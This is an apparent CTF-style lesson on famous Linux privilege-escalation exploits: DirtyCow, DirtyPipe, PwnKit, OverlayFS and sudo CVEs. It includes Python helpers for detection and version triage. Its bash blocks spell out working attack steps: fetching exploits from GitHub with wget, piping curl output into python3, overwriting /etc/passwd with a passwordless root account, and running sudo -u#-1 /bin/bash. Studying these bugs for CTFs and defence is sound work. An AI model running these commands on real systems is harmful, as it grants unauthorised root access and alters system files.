Famous Kernel Exploits

advanced · 35 min · Writeup

DirtyCow, DirtyPipe, and other famous kernel vulns

Learning Objectives

  • Understand DirtyCow vulnerability
  • Exploit DirtyPipe (CVE-2022-0847)
  • Use other famous kernel CVEs
  • Know when to use kernel exploits

Some kernel exploits become so famous they get names: DirtyCow, DirtyPipe, PwnKit. These are the "greatest hits" of Linux privilege escalation - well-documented, widely affecting, and relatively reliable.

Think of these like legendary heists in hacker lore. Everyone knows them, everyone's heard the stories, and if you find one that works, you're in luck. This lesson covers the most famous Linux exploits, when they apply, and exactly how to use them.

CTF Goldmines

These exploits frequently appear in CTFs because they're well-known and educational. Check kernel version, check for PwnKit - these should be early in your enumeration.

DirtyCow (CVE-2016-5195)

The granddaddy of modern kernel exploits. DirtyCow exploits a race condition in the kernel's Copy-On-Write (COW) mechanism, allowing write access to read-only memory mappings. It was in the kernel for 9 years before discovery.

```bash
# Affected Versions
# Linux Kernel 2.x through 4.x before 4.8.3
# Nearly every Linux system from ~2007-2016

# Check if vulnerable
uname -r
# Vulnerable examples: 2.6.x, 3.x.x, 4.0-4.8.2
# Patched: 4.8.3+, or distro backports

# Multiple exploit versions exist:
# 1. /etc/passwd overwrite (adds root user)
# 2. SUID binary creation
# 3. Write arbitrary files

# === Method 1: passwd Overwrite ===
# Download exploit
searchsploit -m 40839.c

# Compile
gcc -pthread 40839.c -o dirty -lcrypt

# Run
./dirty
# Enter new password: hacked
# Wait... (can take 1-2 minutes)

# When done:
su firefart
# Password: hacked
id
# uid=0(root)

# === Method 2: SUID Binary ===
searchsploit -m 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow

# Creates SUID version of passwd
# Use it to change root password

# === Method 3: Write Any File ===
# Can overwrite any file you can read
# More targeted but more complex
```

DirtyCow Corruption Risk

DirtyCow exploits race conditions and can corrupt files. The passwd overwrite permanently modifies /etc/passwd. Always have a backup plan and clean up after yourself.

DirtyCow Technical Details

How DirtyCow Works:
├── mmap() a read-only file with PROT_READ
├── Start a thread that calls madvise(MADV_DONTNEED)
├── Start another thread that writes to /proc/self/mem
├── Race condition: write wins sometimes
└── Result: Write to read-only memory → file modified

Why "Dirty" + "COW":
├── COW = Copy-On-Write (kernel memory optimization)
├── Dirty = The exploit "dirties" the page cache
└── The race corrupts the COW mechanism

Side Effects:
├── Can corrupt file if exploit interrupted
├── May crash system under heavy load
├── Changes are persistent (actual file modified)
└── Leaves evidence in modified files
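The side effects above are also what a defender looks for: the passwd-overwrite method leaves a second UID-0 account behind, and the rewritten file no longer matches any earlier integrity snapshot. The following is an added example (not code from the page or from any of the exploit projects it references) showing both checks; the function names, the constructed passwd excerpt and the temp-directory simulation in demo() are all assumptions made for the example. Hashing goes through the normal read path, so it also sees a DirtyPipe change for as long as that change is still in the page cache.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Optional


def sha256_file(path: str) -> str:
    """Hash a file through the normal read path (page cache included)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(paths: Iterable[str]) -> Dict[str, Optional[str]]:
    """Record one digest per path; a missing file is recorded as None."""
    return {p: sha256_file(p) if Path(p).is_file() else None for p in paths}


def changed_files(before: Dict[str, Optional[str]],
                  after: Dict[str, Optional[str]]) -> List[str]:
    """Paths whose digest differs between two snapshots (appeared, vanished or rewritten)."""
    return sorted(p for p in set(before) | set(after) if before.get(p) != after.get(p))


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Account names other than 'root' that carry UID 0.

    This is the artefact a passwd overwrite leaves behind (e.g. the
    'firefart' user the DirtyCow exploit adds).
    """
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[0]:
            continue  # blank or malformed line
        if fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


# Constructed /etc/passwd excerpt: root, two normal accounts, one injected UID-0 entry.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:alice:/home/alice:/bin/bash\n"
    "firefart:$6$constructed$hash:0:0:pwned:/root:/bin/bash\n"
)


def demo() -> List[str]:
    """Simulate a passwd overwrite in a temp dir; return the names of the files that changed."""
    with tempfile.TemporaryDirectory() as d:
        passwd = os.path.join(d, "passwd")
        shadow = os.path.join(d, "shadow")
        Path(passwd).write_text("root:x:0:0:root:/root:/bin/bash\n")
        Path(shadow).write_text("root:*:19000:0:99999:7:::\n")
        before = snapshot([passwd, shadow])
        Path(passwd).write_text(SAMPLE_PASSWD)  # the "overwrite"
        after = snapshot([passwd, shadow])
        return [os.path.basename(p) for p in changed_files(before, after)]


if __name__ == "__main__":
    print("changed:", demo())
    print("extra uid 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
```

On a real host you would snapshot /etc/passwd, /etc/shadow and the SUID binaries once from a known-good state and keep the digests off the box; the comparison is only as trustworthy as the snapshot you compare against.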

DirtyPipe (CVE-2022-0847)

The spiritual successor to DirtyCow. DirtyPipe allows writing to arbitrary files even without write permissions - but it's in the page cache only and doesn't persist. More elegant, more reliable, but shorter vulnerable window.

```bash
# Affected Versions
# Linux Kernel 5.8 through 5.16.10
# Also 5.15.x before 5.15.25
# Fixed in 5.16.11, 5.15.25, 5.10.102

# Check if vulnerable
uname -r
# 5.8, 5.9, 5.10.x, 5.11, 5.12, 5.13, 5.14, 5.15.x, 5.16.x

# Quick version check (coarse: still compare the patch level with the fixed releases above)
uname -r | grep -E "^5\.(8|9|1[0-6])"

# === Standard Exploit ===
# Download
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-1.c
# Or: searchsploit -m 50808.c

gcc exploit-1.c -o dirtypipe
./dirtypipe /etc/passwd 1 "\nroot2::\$1\$abc\$xyz:0:0::/root:/bin/bash"
# Writes new root user entry

# Now login
su root2
# No password needed (empty password)

# === SUID Exploit ===
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c
gcc exploit-2.c -o dirtypipe2
./dirtypipe2 /usr/bin/su
# Overwrites SUID binary temporarily
# Run /usr/bin/su for root shell

# Note: Changes revert on reboot (cache only)
```

DirtyPipe Technical Details

How DirtyPipe Works:
├── Create a pipe
├── Fill pipe buffer completely
├── Drain the pipe (leaves flags set)
├── splice() target file into pipe
├── Write to pipe - overwrites file in page cache
└── The PIPE_BUF_FLAG_CAN_MERGE flag is the bug

Key Differences from DirtyCow:
├── More reliable (no race condition)
├── Faster execution
├── Changes are in page cache only
├── Reverts after cache flush/reboot
├── Less likely to crash system
└── Narrower vulnerable version range

Limitations:
├── Cannot extend files (only overwrite)
├── Cannot write at offset 0 of file
└── Changes lost on reboot (not persistent)

DirtyPipe is Cleaner

Unlike DirtyCow, DirtyPipe doesn't permanently modify files. Changes exist only in the kernel page cache. Reboot reverts everything. This makes it safer and leaves fewer traces.

PwnKit (CVE-2021-4034)

Technically not a kernel exploit - PwnKit targets pkexec, a SUID root binary. But its impact is kernel-exploit-level: instant root on almost every Linux system from 2009 to 2022. The most reliable privilege escalation of the decade.

```bash
# Affected: pkexec (polkit) before 0.120
# That's basically every Linux from May 2009 to January 2022

# Check if vulnerable
pkexec --version
# Vulnerable if 0.119 or earlier (most systems)

# Method 1: Pre-compiled
wget https://github.com/ly4k/PwnKit/raw/main/PwnKit
chmod +x PwnKit
./PwnKit
# Instant root shell!

# Method 2: Python one-liner (if curl available)
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.py | python3

# Method 3: Compile yourself
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
./cve-2021-4034

# Method 4: Alternative C version
searchsploit -m 50689.c
gcc 50689.c -o pwnkit
./pwnkit

# Why so reliable?
# - No kernel dependency (just pkexec SUID binary)
# - Works on any architecture
# - Doesn't crash system
# - Fast execution
# - No race conditions
```

PwnKit Technical Details

How PwnKit Works:
├── pkexec takes the program to execute from argv[1]
├── Bug: if argc is 0, argv[1] lies past the end of the argument array
├── argv[1] doesn't exist... it points to envp[0]!
├── Attacker controls envp (environment variables)
├── pkexec re-introduces a "safe" env variable
├── But the write goes past envp into argv area
├── Attacker injects: GCONV_PATH=./payload
├── When pkexec loads a library, our payload runs as root
└── Result: Arbitrary code execution as root

The Bug Chain:
├── argc == 0 (unusual but valid)
├── Out-of-bounds read (argv[1] = envp[0])
├── Out-of-bounds write (g_printerr triggers)
├── Environment injection (GCONV_PATH)
└── Shared library hijacking (our .so)

Why It's Reliable:
├── No race condition
├── No kernel version dependency
├── Works on any distro with polkit
├── Simple, fast, doesn't crash
└── 12+ years of vulnerable systems

Always Try PwnKit

PwnKit should be in your first wave of privilege escalation checks. Check pkexec --version early. If vulnerable, you're done.

Other Famous Exploits

Netfilter (CVE-2022-25636)

```bash
# Affects: Linux 5.4 through 5.6.10
# Heap overflow in netfilter

# Check if netfilter loaded
lsmod | grep nf_tables

# Exploit complex, requires specific conditions
# Less common in CTFs but appears occasionally
```

eBPF Exploits (Various CVEs)

```bash
# Multiple eBPF vulnerabilities 2020-2022
# CVE-2021-3490, CVE-2021-31440, etc.

# Check eBPF availability
cat /proc/sys/kernel/unprivileged_bpf_disabled
# 0 = eBPF available to unprivileged users (potentially vulnerable)
# 1 = Restricted (safer)

# eBPF exploits are complex but powerful
# Bypass many security controls
```

OverlayFS (CVE-2021-3493)

```bash
# Ubuntu-specific overlay filesystem exploit
# Affects Ubuntu kernels with overlay support

# Check
cat /proc/filesystems | grep overlay

# Exploit
searchsploit -m 49688.c
gcc 49688.c -o overlayfs
./overlayfs
# Root shell on vulnerable Ubuntu systems
```

Sudo Exploits

```bash
# Not kernel exploits but equally famous

# Baron Samedit (CVE-2021-3156)
# Heap overflow in sudo before 1.9.5p2
sudo --version
# 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1 = vulnerable

searchsploit baron samedit
# Multiple exploits available

# CVE-2019-14287 (sudo -u#-1)
# Bypass when (ALL, !root) is configured
sudo -u#-1 /bin/bash
```

Quick Reference Card

Famous Exploit Quick Reference:
┌───────────────┬──────────────────────┬──────────────────────┐
│ Exploit       │ Kernel/Version       │ Check Command        │
├───────────────┼──────────────────────┼──────────────────────┤
│ DirtyCow      │ < 4.8.3              │ uname -r             │
│ DirtyPipe     │ 5.8 - 5.16.10        │ uname -r             │
│ PwnKit        │ pkexec < 0.120       │ pkexec --version     │
│ Baron Samedit │ sudo 1.8.2-1.9.5p1   │ sudo --version       │
│ OverlayFS     │ Ubuntu-specific      │ Ubuntu + overlay     │
│ Netfilter     │ 5.4 - 5.6.10         │ uname -r + lsmod     │
└───────────────┴──────────────────────┴──────────────────────┘

Exploit Priority Order (try first to last):
1. PwnKit - Most reliable, no kernel dependency
2. Sudo CVEs - Check sudo version early
3. DirtyPipe - If kernel 5.8-5.16
4. DirtyCow - If kernel < 4.8.3
5. Others - Specific to configuration

Famous Exploit Methodology

Famous Exploit Check Flow

1. PwnKit: check pkexec --version (try if < 0.120)
2. Sudo: check sudo --version (Baron Samedit, others)
3. Kernel: check uname -r for the DirtyPipe/DirtyCow range
4. Download: get the appropriate exploit from GitHub/searchsploit
5. Compile: match architecture and libraries
6. Execute: run and capture root shell
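Steps 1 to 3 of the check flow, and the version columns of the quick reference card, are easy to get wrong by eye: `5.10.0-9` has a distro suffix, `1.8.31p2` has a patch level that sorts after `1.8.31`, and the DirtyPipe range has per-branch fix releases. The script below is an added example, not code from the page or from any exploit project it names; it encodes the version boundaries exactly as the page lists them (before 4.8.3; 5.8 to 5.16.10 with fixes in 5.10.102, 5.15.25 and 5.16.11; pkexec before 0.120; sudo 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1). The function names and the three sample hosts are assumptions constructed for the example. As the page itself notes for DirtyCow, distro backports can patch a kernel without bumping the upstream version, so a hit here is a candidate to confirm, not a verdict.

```python
import re
from typing import List, Tuple

Version = Tuple[int, ...]


def parse_kernel(uname_r: str) -> Version:
    """Reduce a `uname -r` string such as '5.15.0-56-generic' to (5, 15, 0).

    Only the dotted numeric prefix is compared; the distro suffix is ignored,
    which is exactly why distro backports can make this check wrong.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError(f"unrecognised kernel version: {uname_r!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def parse_sudo(version: str) -> Version:
    """'1.9.5p1' -> (1, 9, 5, 1); a release without a patch level counts as p0."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4) or 0))


def parse_pkexec(output: str) -> Version:
    """`pkexec --version` prints e.g. 'pkexec version 0.105' -> (0, 105)."""
    m = re.search(r"(\d+)\.(\d+)", output)
    if not m:
        raise ValueError(f"unrecognised pkexec output: {output!r}")
    return (int(m.group(1)), int(m.group(2)))


def in_dirtycow_range(k: Version) -> bool:
    # Page: kernels before 4.8.3 (2.x through 4.x).
    return k < (4, 8, 3)


def in_dirtypipe_range(k: Version) -> bool:
    # Page: 5.8 through 5.16.10, with point fixes in 5.10.102, 5.15.25, 5.16.11.
    if k < (5, 8, 0):
        return False
    fixed_in = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
    if k[:2] in fixed_in:
        return k < fixed_in[k[:2]]
    return k < (5, 17, 0)


def in_pwnkit_range(p: Version) -> bool:
    # Page: pkexec (polkit) before 0.120.
    return p < (0, 120)


def in_baron_samedit_range(s: Version) -> bool:
    # Page: sudo 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1.
    return (1, 8, 2, 0) <= s <= (1, 8, 31, 2) or (1, 9, 0, 0) <= s <= (1, 9, 5, 1)


def triage(uname_r: str, pkexec_output: str, sudo_version: str) -> List[str]:
    """Candidates in the page's priority order: PwnKit, sudo, DirtyPipe, DirtyCow."""
    hits = []
    if in_pwnkit_range(parse_pkexec(pkexec_output)):
        hits.append("PwnKit (CVE-2021-4034)")
    if in_baron_samedit_range(parse_sudo(sudo_version)):
        hits.append("Baron Samedit (CVE-2021-3156)")
    kernel = parse_kernel(uname_r)
    if in_dirtypipe_range(kernel):
        hits.append("DirtyPipe (CVE-2022-0847)")
    if in_dirtycow_range(kernel):
        hits.append("DirtyCow (CVE-2016-5195)")
    return hits


if __name__ == "__main__":
    # Constructed sample hosts; on a live box feed in the output of `uname -r`,
    # `pkexec --version` and `sudo --version | head -1` instead.
    samples = [
        ("5.15.0-56-generic", "pkexec version 0.105", "Sudo version 1.9.5p2"),
        ("4.4.0-21-generic", "pkexec version 0.120", "Sudo version 1.8.16"),
        ("6.1.0-10-amd64", "pkexec version 0.120", "Sudo version 1.9.13p3"),
    ]
    for uname_r, pk, su in samples:
        found = triage(uname_r, pk, su) or ["nothing on the card"]
        print(f"{uname_r:20} -> {', '.join(found)}")
```

Note that the DirtyPipe check returns True for 5.10.0 but False for 5.10.102, and the sudo check returns True for 1.9.5 (p0) but False for 1.9.5p2: both distinctions are lost if you compare version strings lexically.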

Knowledge Check

Quick Quiz (Question 1 of 3)

What's the main difference between DirtyCow and DirtyPipe modifications?

Challenges

Identify the Right Exploit

Challenge
🔥 intermediate

You have shell on a system with kernel 5.10.0-9 and pkexec 0.118. Which famous exploit(s) would you try, and in what order?


Key Takeaways

  • PwnKit: Check pkexec --version, affects 2009-2022 systems
  • DirtyCow: Kernel < 4.8.3, permanently modifies files
  • DirtyPipe: Kernel 5.8-5.16.10, cache-only (reverts on reboot)
  • Check famous exploits early - they're often the easiest path
  • PwnKit should be first choice when available (most reliable)
  • Know the version ranges - this is testable knowledge